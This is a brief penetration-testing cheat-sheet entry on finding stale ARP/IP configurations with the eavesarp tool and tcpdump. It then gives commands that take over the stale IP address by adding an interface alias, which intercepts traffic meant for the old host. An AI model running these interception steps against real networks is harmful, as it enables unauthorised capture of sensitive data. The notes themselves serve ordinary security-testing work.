SNACs Abuse

• https://www.blackhillsinfosec.com/analyzing-arp-to-discover-exploit-stale-network-address-configurations/

• https://github.com/arch4ngel/eavesarp

• https://github.com/s0i37/net/blob/main/arp_snac.py

Actively analyze ARP traffic and hunt for SNACs (Stale Network Address Configurations):

$ sudo python3 eavesarp.py capture -i eth0 -ar -dr [--blacklist 192.168.1.11]

If a SNAC if found (can be detected, for example, when a host has moved from one IP to another and its DNS A record not matching its DNS PTR record anymore) so that some application in the network is still trying to send sensitive data to the stale IP address (because it may simply be hard-coded in the app), an adversary can set an alias for their interface pretending to be that host with the stale IP and collect all the traffic intended for it:

# Check again with tcpdump
$ sudo tcpdump -nvv -i eth0 "src host <STALE_IP> and arp"

# Abuse it!
$ sudo tcpdump -nA -i eth0 "src host <STALE_IP> and (dst port 80 or dst port 443)"
Or
$ sudo tcpdump -nvv -i eth0 -s 65535 -w eavesarp.pcap "host <STALE_IP>"
$ sudo ip addr add <STALE_IP>/24 dev eth0

# Clean up
$ sudo ip addr del <STALE_IP>/24 dev eth0